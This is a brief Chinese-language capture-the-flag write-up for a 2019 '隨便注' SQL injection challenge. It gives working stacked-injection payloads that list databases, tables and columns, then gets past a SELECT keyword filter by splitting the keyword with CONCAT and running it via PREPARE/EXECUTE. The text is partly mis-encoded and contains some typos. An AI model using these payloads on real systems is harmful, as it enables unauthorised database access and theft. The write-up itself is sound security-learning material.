BUU-Web-[強網(wǎng)杯 2019]隨便注1
這是一道SQL注入題

先進行簡單是注入操作,發(fā)現(xiàn)了敏感庫名‘supersqli’【1';show databases;】

當然我們也可以查看其他庫里的內容【1';show tables from supersqli;】

要素察覺!

然后我們嘗試查看丑表【1';show columns from `1919810931114514`;】注意這里對丑表的表名需要添加反引號``

當我們嘗試把flag用SELECT取出時發(fā)現(xiàn)SELECT被進行了過濾

這里可以嘗試使用堆疊注入,進行預處理【1';SET @b=CONCAT('SEL','ECT flag FROM `1919810931114514`;');PREPARE a FROM @b;execute a;】



對使用的命令進行總結
show databases;? ?查看數(shù)據(jù)庫
show tables from [databases_name]? ?查看該數(shù)據(jù)庫中的表名
show columns from [table_name]????查看該表中的字段
SELSECT [value]?from? [columns_name] 查詢該字段下的vulue這條數(shù)據(jù)的內容
SET? ?@b = [XXX]?????設置變量@b為xxxx
CONCAT(a,b)????????????將a,b內容進行拼接
PREPARE a from @b;???????定義預處理語句將預處理語句說明為a
EXECUTE a;????????執(zhí)行預處理語句
標簽: